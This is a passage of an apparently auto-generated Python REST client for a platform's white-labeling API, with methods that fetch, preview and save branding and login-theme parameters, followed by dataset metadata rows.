files=local_var_files,
response_type='LoginWhiteLabelingParams', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_current_white_label_params_using_get(self, **kwargs): # noqa: E501
"""getCurrentWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_current_white_label_params_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: WhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_current_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_current_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_current_white_label_params_using_get_with_http_info(self, **kwargs): # noqa: E501
"""getCurrentWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_current_white_label_params_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: WhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/whiteLabel/currentWhiteLabelParams', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WhiteLabelingParams', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_login_theme_css_using_post(self, palette_settings, **kwargs): # noqa: E501
"""getLoginThemeCss # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_login_theme_css_using_post(palette_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PaletteSettings palette_settings: paletteSettings (required)
:param bool dark_foreground: darkForeground
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_login_theme_css_using_post_with_http_info(palette_settings, **kwargs) # noqa: E501
else:
(data) = self.get_login_theme_css_using_post_with_http_info(palette_settings, **kwargs) # noqa: E501
return data
def get_login_theme_css_using_post_with_http_info(self, palette_settings, **kwargs): # noqa: E501
"""getLoginThemeCss # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_login_theme_css_using_post_with_http_info(palette_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PaletteSettings palette_settings: paletteSettings (required)
:param bool dark_foreground: darkForeground
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['palette_settings', 'dark_foreground'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'palette_settings' is set
if ('palette_settings' not in params or
params['palette_settings'] is None):
raise ValueError("Missing the required parameter `palette_settings` when calling `get_login_theme_css_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'dark_foreground' in params:
query_params.append(('darkForeground', params['dark_foreground'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'palette_settings' in params:
body_params = params['palette_settings']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['plain/text']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/noauth/whiteLabel/loginThemeCss{?darkForeground}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_login_white_label_params_using_get(self, **kwargs): # noqa: E501
"""getLoginWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_login_white_label_params_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str logo_image_checksum: logoImageChecksum
:param str favicon_checksum: faviconChecksum
:return: LoginWhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_login_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_login_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_login_white_label_params_using_get_with_http_info(self, **kwargs): # noqa: E501
"""getLoginWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_login_white_label_params_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str logo_image_checksum: logoImageChecksum
:param str favicon_checksum: faviconChecksum
:return: LoginWhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['logo_image_checksum', 'favicon_checksum'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'logo_image_checksum' in params:
query_params.append(('logoImageChecksum', params['logo_image_checksum'])) # noqa: E501
if 'favicon_checksum' in params:
query_params.append(('faviconChecksum', params['favicon_checksum'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/noauth/whiteLabel/loginWhiteLabelParams{?logoImageChecksum,faviconChecksum}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LoginWhiteLabelingParams', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_white_label_params_using_get(self, **kwargs): # noqa: E501
"""getWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_white_label_params_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str logo_image_checksum: logoImageChecksum
:param str favicon_checksum: faviconChecksum
:return: WhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_white_label_params_using_get_with_http_info(self, **kwargs): # noqa: E501
"""getWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_white_label_params_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str logo_image_checksum: logoImageChecksum
:param str favicon_checksum: faviconChecksum
:return: WhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['logo_image_checksum', 'favicon_checksum'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'logo_image_checksum' in params:
query_params.append(('logoImageChecksum', params['logo_image_checksum'])) # noqa: E501
if 'favicon_checksum' in params:
query_params.append(('faviconChecksum', params['favicon_checksum'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/whiteLabel/whiteLabelParams{?logoImageChecksum,faviconChecksum}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WhiteLabelingParams', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def is_customer_white_labeling_allowed_using_get(self, **kwargs): # noqa: E501
"""isCustomerWhiteLabelingAllowed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.is_customer_white_labeling_allowed_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.is_customer_white_labeling_allowed_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.is_customer_white_labeling_allowed_using_get_with_http_info(**kwargs) # noqa: E501
return data
def is_customer_white_labeling_allowed_using_get_with_http_info(self, **kwargs): # noqa: E501
"""isCustomerWhiteLabelingAllowed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.is_customer_white_labeling_allowed_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/whiteLabel/isCustomerWhiteLabelingAllowed', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def is_white_labeling_allowed_using_get(self, **kwargs): # noqa: E501
"""isWhiteLabelingAllowed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.is_white_labeling_allowed_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.is_white_labeling_allowed_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.is_white_labeling_allowed_using_get_with_http_info(**kwargs) # noqa: E501
return data
def is_white_labeling_allowed_using_get_with_http_info(self, **kwargs): # noqa: E501
"""isWhiteLabelingAllowed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.is_white_labeling_allowed_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/whiteLabel/isWhiteLabelingAllowed', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def preview_white_label_params_using_post(self, white_labeling_params, **kwargs): # noqa: E501
"""previewWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.preview_white_label_params_using_post(white_labeling_params, async_req=True)
>>> result = thread.get()
:param async_req bool
:param WhiteLabelingParams white_labeling_params: whiteLabelingParams (required)
:return: WhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.preview_white_label_params_using_post_with_http_info(white_labeling_params, **kwargs) # noqa: E501
else:
(data) = self.preview_white_label_params_using_post_with_http_info(white_labeling_params, **kwargs) # noqa: E501
return data
def preview_white_label_params_using_post_with_http_info(self, white_labeling_params, **kwargs): # noqa: E501
"""previewWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.preview_white_label_params_using_post_with_http_info(white_labeling_params, async_req=True)
>>> result = thread.get()
:param async_req bool
:param WhiteLabelingParams white_labeling_params: whiteLabelingParams (required)
:return: WhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['white_labeling_params'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'white_labeling_params' is set
if ('white_labeling_params' not in params or
params['white_labeling_params'] is None):
raise ValueError("Missing the required parameter `white_labeling_params` when calling `preview_white_label_params_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'white_labeling_params' in params:
body_params = params['white_labeling_params']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/whiteLabel/previewWhiteLabelParams', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WhiteLabelingParams', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def save_login_white_label_params_using_post(self, login_white_labeling_params, **kwargs): # noqa: E501
"""saveLoginWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.save_login_white_label_params_using_post(login_white_labeling_params, async_req=True)
>>> result = thread.get()
:param async_req bool
:param LoginWhiteLabelingParams login_white_labeling_params: loginWhiteLabelingParams (required)
:return: LoginWhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.save_login_white_label_params_using_post_with_http_info(login_white_labeling_params, **kwargs) # noqa: E501
else:
(data) = self.save_login_white_label_params_using_post_with_http_info(login_white_labeling_params, **kwargs) # noqa: E501
return data
def save_login_white_label_params_using_post_with_http_info(self, login_white_labeling_params, **kwargs): # noqa: E501
"""saveLoginWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.save_login_white_label_params_using_post_with_http_info(login_white_labeling_params, async_req=True)
>>> result = thread.get()
:param async_req bool
:param LoginWhiteLabelingParams login_white_labeling_params: loginWhiteLabelingParams (required)
:return: LoginWhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['login_white_labeling_params'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'login_white_labeling_params' is set
if ('login_white_labeling_params' not in params or
params['login_white_labeling_params'] is None):
raise ValueError("Missing the required parameter `login_white_labeling_params` when calling `save_login_white_label_params_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'login_white_labeling_params' in params:
body_params = params['login_white_labeling_params']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/whiteLabel/loginWhiteLabelParams', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LoginWhiteLabelingParams', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def save_white_label_params_using_post(self, white_labeling_params, **kwargs): # noqa: E501
"""saveWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.save_white_label_params_using_post(white_labeling_params, async_req=True)
>>> result = thread.get()
:param async_req bool
:param WhiteLabelingParams white_labeling_params: whiteLabelingParams (required)
:return: WhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.save_white_label_params_using_post_with_http_info(white_labeling_params, **kwargs) # noqa: E501
else:
(data) = self.save_white_label_params_using_post_with_http_info(white_labeling_params, **kwargs) # noqa: E501
return data
def save_white_label_params_using_post_with_http_info(self, white_labeling_params, **kwargs): # noqa: E501
"""saveWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.save_white_label_params_using_post_with_http_info(white_labeling_params, async_req=True)
>>> result = thread.get()
:param async_req bool
:param WhiteLabelingParams white_labeling_params: whiteLabelingParams (required)
:return: WhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['white_labeling_params'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'white_labeling_params' is set
if ('white_labeling_params' not in params or
params['white_labeling_params'] is None):
raise ValueError("Missing the required parameter `white_labeling_params` when calling `save_white_label_params_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'white_labeling_params' in params:
body_params = params['white_labeling_params']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/whiteLabel/whiteLabelParams', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WhiteLabelingParams', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 39.786615
| 162
| 0.640931
| 4,610
| 41,020
| 5.360521
| 0.047939
| 0.04597
| 0.029136
| 0.038241
| 0.956742
| 0.954718
| 0.953221
| 0.950186
| 0.945371
| 0.940555
| 0
| 0.014752
| 0.272867
| 41,020
| 1,030
| 163
| 39.825243
| 0.813759
| 0.329693
| 0
| 0.852273
| 0
| 0
| 0.177875
| 0.074721
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043561
| false
| 0
| 0.007576
| 0
| 0.11553
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6596c7e857690260b99526c0e304c721bfd2e547
| 198
|
py
|
Python
|
emergency-lights/lib/adafruit_character_lcd/__init__.py
|
eat-sleep-code/circuitplayground-emergency-lights
|
3059c6361403382d3e875df8b9c09af85339ab04
|
[
"MIT"
] | null | null | null |
emergency-lights/lib/adafruit_character_lcd/__init__.py
|
eat-sleep-code/circuitplayground-emergency-lights
|
3059c6361403382d3e875df8b9c09af85339ab04
|
[
"MIT"
] | null | null | null |
emergency-lights/lib/adafruit_character_lcd/__init__.py
|
eat-sleep-code/circuitplayground-emergency-lights
|
3059c6361403382d3e875df8b9c09af85339ab04
|
[
"MIT"
] | null | null | null |
"""include all classes"""
from adafruit_character_lcd.character_lcd import Character_LCD, Character_LCD_I2C, Character_LCD_SPI
from adafruit_character_lcd.character_lcd_rgb import Character_LCD_RGB
| 49.5
| 100
| 0.883838
| 29
| 198
| 5.551724
| 0.37931
| 0.596273
| 0.391304
| 0.447205
| 0.447205
| 0.447205
| 0
| 0
| 0
| 0
| 0
| 0.005405
| 0.065657
| 198
| 3
| 101
| 66
| 0.864865
| 0.09596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
028d9e5c6d4624156103c1242effec63601cc801
| 4,998
|
py
|
Python
|
scripts/descriptors.py
|
licheng-xu-echo/ChemOpt
|
6094a452de02b69fa8ebbbd34fe78841828f6f3d
|
[
"MIT"
] | null | null | null |
scripts/descriptors.py
|
licheng-xu-echo/ChemOpt
|
6094a452de02b69fa8ebbbd34fe78841828f6f3d
|
[
"MIT"
] | null | null | null |
scripts/descriptors.py
|
licheng-xu-echo/ChemOpt
|
6094a452de02b69fa8ebbbd34fe78841828f6f3d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 3 16:38:19 2021
@author: Li-Cheng Xu
"""
from process_utils import process_desc,maxminscale,zscorescale
from rdkit import Chem
from mordred import Calculator, descriptors
from rdkit.Chem import Descriptors
from rdkit.ML.Descriptors import MoleculeDescriptors
from rdkit.Chem.rdMolDescriptors import GetMorganFingerprintAsBitVect
def get_mordred_map(defined_chemical_space,scaler='maxmin'):
'''
desc_map: {category1:{smiles11:desc11,
smiles12:desc12},
category2:{smiles21:desc21,
smiles22:desc22}}
'''
scaler = scaler.lower()
assert scaler == 'maxmin' or scaler == 'z-score', 'scaler only support maxmin and z-score currently.'
calc = Calculator(descriptors, ignore_3D=True)
desc_map = {}
if scaler == 'maxmin':
for tmp_key in defined_chemical_space:
smiles = defined_chemical_space[tmp_key]
mols = [Chem.MolFromSmiles(tmp_smi) for tmp_smi in smiles]
df = calc.pandas(mols).dropna(axis=1)
desc = maxminscale(process_desc(df.to_numpy()))
smi_desc_map = {tmp_smi:tmp_desc for tmp_smi,tmp_desc in zip(smiles,desc)}
desc_map[tmp_key] = smi_desc_map
elif scaler == 'z-score':
for tmp_key in defined_chemical_space:
smiles = defined_chemical_space[tmp_key]
mols = [Chem.MolFromSmiles(tmp_smi) for tmp_smi in smiles]
df = calc.pandas(mols).dropna(axis=1)
desc = zscorescale(process_desc(df.to_numpy()))
smi_desc_map = {tmp_smi:tmp_desc for tmp_smi,tmp_desc in zip(smiles,desc)}
desc_map[tmp_key] = smi_desc_map
return desc_map
def get_mf_map(defined_chemical_space,scaler='maxmin',radius=4,nBits=2048,useChirality=True):
'''
desc_map: {category1:{smiles11:desc11,
smiles12:desc12},
category2:{smiles21:desc21,
smiles22:desc22}}
'''
scaler = scaler.lower()
assert scaler == 'maxmin' or scaler == 'z-score', 'scaler only support maxmin and z-score currently.'
desc_map = {}
if scaler == 'maxmin':
for tmp_key in defined_chemical_space:
smiles = defined_chemical_space[tmp_key]
mols = [Chem.MolFromSmiles(tmp_smi) for tmp_smi in smiles]
desc = np.array([[eval(tmp_item) for tmp_item in Chem.rdMolDescriptors.GetMorganFingerprintAsBitVect(mol,
radius=radius,nBits=nBits,useChirality=useChirality).ToBitString()] for mol in mols])
desc = maxminscale(process_desc(desc))
smi_desc_map = {tmp_smi:tmp_desc for tmp_smi,tmp_desc in zip(smiles,desc)}
desc_map[tmp_key] = smi_desc_map
elif scaler == 'z-score':
for tmp_key in defined_chemical_space:
smiles = defined_chemical_space[tmp_key]
mols = [Chem.MolFromSmiles(tmp_smi) for tmp_smi in smiles]
desc = np.array([[eval(tmp_item) for tmp_item in Chem.rdMolDescriptors.GetMorganFingerprintAsBitVect(mol,
radius=radius,nBits=nBits,useChirality=useChirality).ToBitString()] for mol in mols])
desc = zscorescale(process_desc(desc))
smi_desc_map = {tmp_smi:tmp_desc for tmp_smi,tmp_desc in zip(smiles,desc)}
desc_map[tmp_key] = smi_desc_map
return desc_map
def get_rdkit_map(defined_chemical_space,scaler='maxmin'):
'''
desc_map: {category1:{smiles11:desc11,
smiles12:desc12},
category2:{smiles21:desc21,
smiles22:desc22}}
'''
scaler = scaler.lower()
assert scaler == 'maxmin' or scaler == 'z-score', 'scaler only support maxmin and z-score currently.'
descs = [desc_name[0] for desc_name in Descriptors._descList]
calc = MoleculeDescriptors.MolecularDescriptorCalculator(descs)
desc_map = {}
if scaler == 'maxmin':
for tmp_key in defined_chemical_space:
smiles = defined_chemical_space[tmp_key]
mols = [Chem.MolFromSmiles(tmp_smi) for tmp_smi in smiles]
desc = np.array([calc.CalcDescriptors(mol) for mol in mols])
desc = maxminscale(process_desc(desc))
smi_desc_map = {tmp_smi:tmp_desc for tmp_smi,tmp_desc in zip(smiles,desc)}
desc_map[tmp_key] = smi_desc_map
elif scaler == 'z-score':
for tmp_key in defined_chemical_space:
smiles = defined_chemical_space[tmp_key]
mols = [Chem.MolFromSmiles(tmp_smi) for tmp_smi in smiles]
desc = np.array([calc.CalcDescriptors(mol) for mol in mols])
desc = zscorescale(process_desc(desc))
smi_desc_map = {tmp_smi:tmp_desc for tmp_smi,tmp_desc in zip(smiles,desc)}
desc_map[tmp_key] = smi_desc_map
return desc_map
| 48.057692
| 118
| 0.634454
| 623
| 4,998
| 4.853933
| 0.160514
| 0.0625
| 0.099206
| 0.051587
| 0.828704
| 0.828704
| 0.81713
| 0.81713
| 0.81713
| 0.81713
| 0
| 0.020576
| 0.270708
| 4,998
| 103
| 119
| 48.524272
| 0.809054
| 0.110844
| 0
| 0.810811
| 0
| 0
| 0.05715
| 0
| 0
| 0
| 0
| 0
| 0.040541
| 1
| 0.040541
| false
| 0
| 0.081081
| 0
| 0.162162
| 0.040541
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02d002f9923dc6fd98f78972ffbba5788efece66
| 113
|
py
|
Python
|
depictive/stats/goodness_of_fit.py
|
DEPICTIVE/depictive
|
8b517d599d44fb726b6ca3229b8c931fb2773301
|
[
"Apache-2.0"
] | 1
|
2020-07-14T03:06:33.000Z
|
2020-07-14T03:06:33.000Z
|
depictive/stats/goodness_of_fit.py
|
DEPICTIVE/depictive
|
8b517d599d44fb726b6ca3229b8c931fb2773301
|
[
"Apache-2.0"
] | null | null | null |
depictive/stats/goodness_of_fit.py
|
DEPICTIVE/depictive
